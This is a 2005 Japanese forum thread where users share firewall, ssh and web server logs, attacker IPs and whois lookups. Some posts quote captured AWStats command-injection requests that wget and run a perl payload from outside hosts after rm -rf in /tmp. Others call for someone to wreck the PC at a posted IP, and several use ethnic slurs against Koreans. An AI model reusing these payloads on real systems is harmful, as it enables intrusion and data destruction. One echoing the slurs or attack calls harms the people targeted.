133.5.238.159が、24297ポートをガンガンつついてきた。 毎回IP変わるプロバイダだから、たまにこういうのあってこまる。 つなぎなおしたら止まったけど。 で、IPドメインSEARCHで検索したら大学ってw
59.44.51.* 63.113.199.* 82.165.32.* 82.90.174.* 194.141.32.* 202.225.35.* 210.178.71.* 210.243.12.* 211.253.183.* 211.46.21.* 218.1.64.* 218.108.22.* 219.115.231.* 219.133.51.* 219.166.34.* 222.187.114.* こうやってまとめると傾向が見えてくるな
903 :
名無しさん@お腹いっぱい。 :2005/10/22(土) 18:25:27
>898 cgiスレで聞いたほうが良さそうですね >900 1に書いてあるサイトで検索したんですが、使わないほうが良いかもしれないですね。
192.168.116.1 domain(53) 中レベル プロコトル UDP 攻撃されたIP 192.168.116.2 攻撃されたポート2882 ローカルネットワーク上のコンピュータに属しているので 公開されているネットワーク情報、ドメイン情報はありません これって…自分で自分を攻撃してるってこと?
27回から急速に増え95回になったw
906 :
名無しさん@お腹いっぱい。 :2005/10/23(日) 00:34:19
Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 59.84.0.0/16 b. [ネットワーク名] TOKAI-NET f. [組織名] 株式会社ザ・トーカイ g. [Organization] TOKAI Corporation m. [管理者連絡窓口] MT7711JP n. [技術連絡担当者] KK11421JP n. [技術連絡担当者] MI5375JP p. [ネームサーバ] dns0.tokai.or.jp p. [ネームサーバ] dns1.tokai.or.jp p. [ネームサーバ] dns2.tokai.or.jp [割当年月日] 2004/10/27 [最終更新] 2004/10/27 14:04:01(JST)
↑馬鹿丸出し。
>>904 まぁそういうことでしょう。ワームにやられたんじゃない?
909 :
名無しさん@お腹いっぱい。 :2005/10/23(日) 22:03:07
p091.net220148051.tnc.ne.jp Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 220.148.0.0/18 b. [ネットワーク名] TOKAI-NET f. [組織名] 株式会社ザ・トーカイ g. [Organization] TOKAI CO.Ltd. m. [管理者連絡窓口] MT7711JP n. [技術連絡担当者] KK11421JP n. [技術連絡担当者] MI5375JP p. [ネームサーバ] dns0.tokai.or.jp p. [ネームサーバ] dns1.tokai.or.jp p. [ネームサーバ] dns2.tokai.or.jp [割当年月日] 2003/11/18 [最終更新] 2003/11/18 09:42:08(JST)
2005/10/22(07:30:39) W-SV 219.153.5.53 [80] 400 0 "GET http//www.sc.cninfo.net/ HTTP/1.1" ( dummy )
911 :
名無しさん@お腹いっぱい。 :2005/10/24(月) 19:45:14
218.43.142.164 218.43.40.13 218.43.164.252 218.43.147.210 218.43.155.76 218.43.238.209 218.43.142.6 218.43.38.133 218.43.169.13
912 :
名無しさん@お腹いっぱい。 :2005/10/24(月) 20:08:28
222.82.107.163 ラーメンマン
913 :
名無しさん@お腹いっぱい。 :2005/10/25(火) 00:25:10
スレ違いかもしれないが、プロバイダ毎に割り当てられたIP全ての リスト、もしくは検索できる場所って無いかな? IP検索で出た範囲をいちいちブロックするのが面倒くさいので プロバイダ全体を一気に指定したいのだが。
>>913 プロバイダごとだとかなーり細かくて大変じゃないかな。
JPNICとAPNICの日本分だけならまだなんとかなるよ。250個くらいだったかな。
sshやftpなんかは日本以外を除外するだけでもかなり効果あり。
915 :
名無しさん@お腹いっぱい。 :2005/10/25(火) 05:40:50
皆さんはなんのソフトで弾いてますか?
ログに残ってるいって事は外部からのアクセスをブロックしているのに、 それにも気付かないんだなw 何のためのルーターのセキュリティ機能やファイアーウォールを使っているんだか。 ここに書き込んでいいのは、サーバーを立てているやつだけ。 厨房 乙
2005/10/25(08:10:52) W-SV www.shatura.com(62.33.243.52) [80] 302 29 "HEAD / HTTP/1.0" ( )
IPアドレス 220.210.152.100 ホスト名 100.152.210.220.dy.bbexcite.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 愛知県 市外局番 -- 接続回線 光
919 :
名無しさん@お腹いっぱい。 :2005/10/25(火) 12:44:42
202.140.223.151 TOSHIMA-NETWORK gs223-151.toshima.ne.jp
920 :
名無しさん@お腹いっぱい。 :2005/10/25(火) 19:42:05
b. [ネットワーク名] AKAMAI-NTT
921 :
名無しさん@お腹いっぱい。 :2005/10/25(火) 21:57:30
203.181.38.199 JPNIC-NET-JP q038199.ppp.asahi-net.or.jp
IPアドレス 221.117.212.123 ホスト名 221x117x212x123.ap221.ftth.ucom.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 北海道
ルール「NetBus トロイの木馬のデフォルト遮断」が 58.226.59.136、NetBus(12345)を遮断しました。 インバウンド TCP 接続 リモートアドレス、サービスは (58.226.59.136、2392) プロセス名は "N/A" 本日二回目、チョンウザス…
216.240.143.173
210.139.230.247 SO-NETからのご来訪。
2005/10/26(21:55:06) W-SV 211.43.135.123 [80] 302 29 "HEAD / HTTP/1.0" ( ) 2005/10/27(05:02:37) W-SV 211.20.32.251 [80] 400 0 "GET http//www.yahoo.com/ HTTP/1.1" ( dummy )
TCP SYN FLOOD攻撃 222.189.238.24 2005/10/27 21:33:26 - 2005/10/27 21:37:09 ヒット数133
210.117.180.111(dalmuri.chonbuk.ac.kr)
929 :
名無しさん@お腹いっぱい。 :2005/10/28(金) 00:09:52
時間 種類 ログ情報 2005/09/29 23:01:16 ATTACK Delete packet cache entry ( Last=1970/01/01 09:00:00 : [ syn-flood ] 222.191.251.83 count=1 ) これって、何かまずい事されてるの?
930 :
名無しさん@お腹いっぱい。 :2005/10/28(金) 04:20:42
211.125.245.1 OCT…大分?
Oct 27 23:18:48 *** sshd[31170]: Failed password for invalid user \357\273\277root from 210.169.196.82 port 41274 ssh2 Oct 27 23:18:58 *** sshd[31172]: (pam_unix) authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=210.169.196.82 Oct 27 23:19:00 *** sshd[31172]: Failed password for invalid user fluffy from 210.169.196.82 port 41711 ssh2 $ whois 210.169.196.82 a. [IPネットワークアドレス] 210.169.196.80/28 b. [ネットワーク名] NEXTFORCE f. [組織名] 有限会社 NEXT FORCE g. [Organization] NEXT FORCE Corporation サーバー腐ってる。 --
Oct 28 02:03:40 *** sshd[29572]: (pam_unix) authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.222.31.199 Oct 28 02:03:42 *** sshd[29572]: Failed password for invalid user yashiro from 202.222.31.199 port 50372 ssh2 a. [IPネットワークアドレス] 202.222.31.0/24 b. [ネットワーク名] SAKURA-NET f. [組織名] エスアールエス・さくらインターネット株式会社
2005/10/28(13:57:44) W-SV 218.249.8.227 [80] 400 0 "GET http//www.google.com/ HTTP/1.1" ( dummy )
934 :
名無しさん@お腹いっぱい。 :2005/10/29(土) 06:33:00
inetnum: 211.206.0.0 - 211.211.255.255
netname: HANANET
descr: Hanaro Telecom, Inc.
country: KR
admin-c: IS37-AP
tech-c: SH243-AP
remarks: ***********************************************
remarks: KRNIC of NIDA is the National Internet Registry
remarks: in Korea under APNIC. If you would like to
remarks: find assignment information in detail
remarks: please refer to the NIDA Whois DB
remarks:
http://whois.nida.or.kr/english/index.html remarks: ***********************************************
mnt-by: MNT-KRNIC-AP
mnt-lower: MNT-KRNIC-AP
changed:
[email protected] 20001228
changed:
[email protected] 20010627
status: ALLOCATED PORTABLE
changed:
[email protected] 20041007
source: APNIC
% APNIC database, last updated 20050925 23:00:32
またチョンだよ・・・・ハァ
935 :
名無しさん@お腹いっぱい。 :2005/10/29(土) 10:28:48
今日LogWatchのメールの容量が大きめだったから またkrかtwかと思ったら日本だったorz unknown (wave.progress.co.jp): 2101 Time(s) wave.progress.co.jp. 600 IN A 210.172.80.194 a. [IPネットワークアドレス] 210.172.80.192/28 b. [ネットワーク名] PROGRESS-NET f. [組織名] 株式会社プログレス
83.73.65.209 デンマーク 59.6.28.76 韓国 侵入検知が Default Block NetBus Trojan horse トロイの木馬を検出して遮断しました。
222.3.244.186
938 :
名無しさん@お腹いっぱい。 :2005/10/31(月) 00:37:34
田中しゅうじ必死だなw 202.12.246.122
2005/10/28(20:15:16) W-SV 62.101.193.244 [80] 404 0 "POST /xmlrpc.php HTTP/1.1" ( dummy ) 2005/10/28(20:15:21) W-SV 62.101.193.244 [80] 404 0 "POST /xmlrpc/xmlrpc.php HTTP/1.1" ( dummy ) 2005/10/28(20:15:26) W-SV 62.101.193.244 [80] 404 0 "POST /xmlsrv/xmlrpc.php HTTP/1.1" ( dummy ) 2005/10/28(20:15:33) W-SV 62.101.193.244 [80] 404 0 "POST /services/xmlrpc.php HTTP/1.1" ( dummy ) 2005/10/28(20:15:37) W-SV 62.101.193.244 [80] 404 0 "POST /blog/xmlrpc.php HTTP/1.1" ( dummy ) 2005/10/28(20:15:42) W-SV 62.101.193.244 [80] 404 0 "POST /drupal/xmlrpc.php HTTP/1.1" ( dummy ) 2005/10/28(20:15:48) W-SV 62.101.193.244 [80] 404 0 "POST /community/xmlrpc.php HTTP/1.1" ( dummy ) 2005/10/28(20:15:53) W-SV 62.101.193.244 [80] 404 0 "POST /blogs/xmlrpc.php HTTP/1.1" ( dummy ) 2005/10/28(20:15:58) W-SV 62.101.193.244 [80] 404 0 "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" ( dummy ) 2005/10/28(20:16:03) W-SV 62.101.193.244 [80] 404 0 "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" ( dummy ) 2005/10/28(20:16:09) W-SV 62.101.193.244 [80] 404 0 "POST /blogtest/xmlsrv/xmlrpc.php HTTP/1.1" ( dummy ) 2005/10/28(20:16:14) W-SV 62.101.193.244 [80] 404 0 "POST /b2/xmlsrv/xmlrpc.php HTTP/1.1" ( dummy ) 2005/10/28(20:16:20) W-SV 62.101.193.244 [80] 404 0 "POST /b2evo/xmlsrv/xmlrpc.php HTTP/1.1" ( dummy ) 2005/10/28(20:16:25) W-SV 62.101.193.244 [80] 404 0 "POST /wordpress/xmlrpc.php HTTP/1.1" ( dummy ) これも脆弱性か。
IPアドレス「 210.154.213.101 」 ホスト名 「 p2101-ipbf201kanazawa.ishikawa.ocn.ne.jp 」 以前、IPは異なるが金沢から同じように突っ込んできたヤツがいた。 ワームが蔓延してると言うか、甘いヤツが多いんじゃねえか?
ssh bruteforce Name: zion.digitalventures.com.au Address: 203.19.28.130
2005/10/31(19:26:20) W-SV 65.98.25.2 [80] 404 0 "GET /awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http//members.lycos.co.uk/sosonel/in;perl%20;echo%20;rm%20-rf%20in*;echo| HTTP/1.1" ( dummy ) 2005/10/31(19:26:32) W-SV 65.98.25.2 [80] 404 0 "GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http//members.lycos.co.uk/sosonel/in;perl%20in;echo%20;rm%20-rf%20in*;echo| HTTP/1.1" ( dummy ) 2005/10/31(19:26:36) W-SV 65.98.25.2 [80] 302 29 "GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http//members.lycos.co.uk/sosonel/in;perl%20in;echo%20;rm%20-rf%20in*;echo| HTTP/1.1" ( dummy ) 2005/10/31(19:26:38) W-SV 65.98.25.2 [80] 404 0 "GET /cgi/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http//members.lycos.co.uk/sosonel/in;perl%20in;echo%20;rm%20-rf%20in*;echo| HTTP/1.1" ( dummy ) 2005/10/31(19:26:44) W-SV 65.98.25.2 [80] 404 0 "GET /awstats.pl/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http//members.lycos.co.uk/sosonel/in;perl%20in;echo%20;rm%20-rf%20in*;echo| HTTP/1.1" ( dummy ) 2005/10/31(19:26:50) W-SV 65.98.25.2 [80] 404 0 "GET /stats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http//members.lycos.co.uk/sosonel/in;perl%20in;echo%20;rm%20-rf%20in*;echo| HTTP/1.1" ( dummy ) 2005/10/31(19:26:56) W-SV 65.98.25.2 [80] 404 0 "GET /stats/awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http//members.lycos.co.uk/sosonel/in;perl%20in;echo%20;rm%20-rf%20in*;echo| HTTP/1.1" ( dummy ) 2005/10/31(19:27:02) W-SV 65.98.25.2 [80] 404 0 "GET /stats/cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http//members.lycos.co.uk/sosonel/in;perl%20in;echo%20;rm%20-rf%20in*;echo| HTTP/1.1" ( dummy ) 2005/11/01(08:15:02) W-SV 211.21.21.227 [80] 302 29 "HEAD / HTTP/1.0" ( ) これは酷い。
つーか不正アクセスしているIP晒しても、 無意味な場合がほとんどだろう。 クラッカーはほとんどの場合、他人のホストを 踏み台にしてアクセスかけるのが普通だろから。 ちがうか?
簡単に自ホストのセキュリティホールをチェックする方法って 何かないかな。
個別ポート指定でスキャンスするサイトなら知ってる。
>>946 サーバ(マシン全体あるいはウェブサーバ)がじゃなくて、
awstatsの特定バージョンに穴があるんでしょ。有名やん。
うちにも同じのはときどきくる。最新は29日に219.166.34.48からきた。
IPアドレス 202.231.11.246 ホスト名 intrasrv.asahikawa-nct.ac.jp IPアドレス 割当国 ※ 日本 (JP)
210.143.155.18:135 フリービット株式会社 何か攻撃してくるお(><)
951 :
名無しさん@お腹いっぱい。 :2005/11/03(木) 01:02:40
218.217.109.45 achrsm002045.adsl.ppp.infoweb.ne.jp
952 :
名無しさん@お腹いっぱい。 :2005/11/03(木) 01:17:49
アクセス禁止にされたサイトを見る方法ってありますか?
953 :
名無しさん@お腹いっぱい。 :2005/11/03(木) 01:20:29
ZD084196.ppp.dion.ne.jp IP(220.214.84.196) このIPのPC壊すことできますか? できたらやってください。
>>953 んで、その人がリモートホストを変えない自信はどこからあふれてきてるんですか?
955 :
名無しさん@お腹いっぱい。 :2005/11/03(木) 02:08:54
わからんけどこわしてw
. + /K\ /K\ /K\ + 復讐っ 復讐っ( ´∀`∩(´∀`∩)( ´ー`) + (( (つ ノ(つ 丿(つ つ )) + ヽ ( ノ ( ノ ) ) ) 復讐っ 復讐っ(_)し' し(_) (_)_)
いつまでも同じホスト踏み台にしてるようなアフォのPCなら勝手に壊れるだろ
958 :
名無しさん@お腹いっぱい。 :2005/11/03(木) 02:38:18
壊せないのか。
960 :
名無しさん@お腹いっぱい。 :2005/11/03(木) 02:50:46
ZD084196.ppp.dion.ne.jp IP(220.214.84.196) じゃあやれる人やっちゃって
泥棒の家は用心深いもの
962 :
名無しさん@お腹いっぱい。 :2005/11/03(木) 03:14:03
ZD084196.ppp.dion.ne.jp IP(220.214.84.196) これ多分用心してないとおもわれ
じゃやってみな 踏み台にされてるだけのヤツならこっちが犯罪だぞ
これも酷い。 2005/11/01(08:15:02) W-SV 211.21.21.227 [80] 302 29 "HEAD / HTTP/1.0" ( ) 2005/11/02(20:50:19) W-SV 221024.ds.nac.net(66.246.72.156) [80] 404 0 "GET /awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http//203.204.230.205/vnc8.gif;perl%20vnc8.gif;echo%20;rm%20-rf%20vnc8.gif*;echo| HTTP/1.1" ( dummy ) 2005/11/02(20:50:21) W-SV 221024.ds.nac.net(66.246.72.156) [80] 2005/11/02(20:50:22) W-SV 221024.ds.nac.net(66.246.72.156) [80] 2005/11/02(20:50:22) W-SV 221024.ds.nac.net(66.246.72.156) [80] 2005/11/02(20:50:22) W-SV 221024.ds.nac.net(66.246.72.156) [80] 2005/11/02(20:50:23) W-SV 221024.ds.nac.net(66.246.72.156) [80] 2005/11/02(20:50:23) W-SV 221024.ds.nac.net(66.246.72.156) [80] 2005/11/02(20:50:24) W-SV 221024.ds.nac.net(66.246.72.156) [80] 404 0 "GET /stats/cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http//203.204.230.205/vnc8.gif;perl%20vnc8.gif;echo%20;rm%20-rf%20vnc8.gif*;echo| HTTP/1.1" ( dummy ) 抜けてるのは同じような内容。パスが微妙に違うだけ。
965 :
名無しさん@お腹いっぱい。 :2005/11/04(金) 12:39:24
219.114.1.167 OCN! OCN! hodogaya
966 :
名無しさん@お腹いっぱい。 :2005/11/04(金) 14:06:22
PHPのセキュリティ問題深刻だな。 管理者なおまいらは注意しろよ。
あぱっち!あぱっち!
968 :
名無しさん@お腹いっぱい。 :2005/11/04(金) 18:54:50
ほれ来た! 222.13.84.223 ZQ084223.ppp.dion.ne.jp
219-100-38-145.denkosekka.ne.jp [219.100.38.145] Port:4498にやたらアクセスがあった
IPアドレス「 210.154.158.201 」 ホスト名 「 ris3201.ryucom.ne.jp 」 忘れかけた頃に間違い無く突撃して来るんだよな・・・ 沖縄って甘い連中が多いのか?
日付と時刻: 2005.11.5 2:06:38 AM 処理: アクセス試行を拒否しました サービス: 不明 ポート: 135 モード: TCP IP アドレス: 210.139.197.176 ホスト名: p8bc5b0.onenum03.ap.so-net.ne.jp ソネットの糞バカ! ネトゲ止めれ!
972 :
名無しさん@お腹いっぱい。 :2005/11/05(土) 09:42:27
220.97.150.183 OCN
NEWTEAR攻撃ってのとフラグメントフラッドエラーってのが交互に頻繁にあります。 恐いです・・・
216 名前:名無しさん@お腹いっぱい。 投稿日:05/01/22 18:37:37
>>216 スレ勉しる。
おまいの晒したIP無意味だぽ。
反論したければ、特定結果かもしくは通報の返答をうpしる。
っても、池沼にゃ無理な相談か。。。
>>216 m9(^Д^)
*NetBIOS www.naver.co.kr NETBIOS_DGM 受信 UDP パソコンを起動するとファイヤーウォールに必ずこれが出てきます。 時間を見るとパソコン起動時か、ネット接続時などの早期に繋がっているようです。 もちろんNAVERには行っていません。 2ちゃんねるのスポンサーなのでそのせいでしょうか? 誰かわかる方いたら教えてください・・・
IPアドレス 133.46.31.48 ホスト名 carnation.ier.hit-u.ac.jp IPアドレス 割当国 ※ 日本 (JP)
このIPからしつこくポートスキャンくるんだけど個人?
61.213.156.139
role: Japan Network Information Center
address: Kokusai-Kougyou-Kanda Bldg 6F, 2-3-4 Uchi-Kanda
address: Chiyoda-ku, Tokyo 101-0047, Japan
country: JP
phone: +81-3-5297-2311
fax-no: +81-3-5297-2312
e-mail:
[email protected] admin-c: JI13-AP
tech-c: JE53-AP
nic-hdl: JNIC1-AP
mnt-by: MAINT-JPNIC
changed:
[email protected] 20041222
changed:
[email protected] 20050324
changed:
[email protected] 20051027
source: APNIC
979 :
名無しさん@お腹いっぱい。 :2005/11/05(土) 19:17:42
IPドメインSEARCHで調べたらここだった踏み台かな? Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 61.213.156.128/27 b. [ネットワーク名] REDSHERIFF f. [組織名] レッド・シェリフ株式会社 g. [Organization] Red Sheriff m. [管理者連絡窓口] SE462JP n. [技術連絡担当者] SE462JP n. [技術連絡担当者] TT6344JP p. [ネームサーバ] [割当年月日] 2003/04/11 [最終更新] 2003/04/11 18:12:03(JST)
以下の3つから大量にftpアタック。 63.110.56.253 68.225.152.253 208.189.27.253 以下からはWebHintsの脆弱性狙いのアタック。 62.101.193.244
981 :
名無しさん@お腹いっぱい。 :2005/11/06(日) 07:51:53
220.210.120.74 t120074.ipgw.phs.yoyogi.mopera.
IPって晒されたらヤヴァいの? あとためしにこのIPについて調べてくだせぇ i220-108-0-187.s02.a001.ap.plala.or.jp
もうヤヴァすぎ
>>983 もぉー
プンプン(←きしょww
>>984 どこで調べましたか?
>>1 のリンクにあるやつ?
教えてチャソスマソ
( ・∀・)<エロいなうんこマン。教えてぇー!
986 :
名無しさん@お腹いっぱい。 :2005/11/06(日) 11:27:10
IPアドレス 60.124.139.28 ホスト名 YahooBB060124139028.bbtec.net
987 :
名無しさん@お腹いっぱい。 :2005/11/06(日) 11:28:44
つーか全部IP偽装でアタックしてんだよ あほかこのスレ もうやめれ
IP偽装の仕組み知ってる? IP偽装でどんな攻撃ができるかとか。 IP偽装だと不正アクセスはできない。
>>988 それは、ギャグで言っているのか?(AA略)
もうすぐカウントダウン開始で終焉。 次スレ立てるなよ!
992 :
名無しさん@お腹いっぱい。 :2005/11/06(日) 13:10:35
このスレッドは1000を超えました。 もう書けないので、終わりです。
あらあら。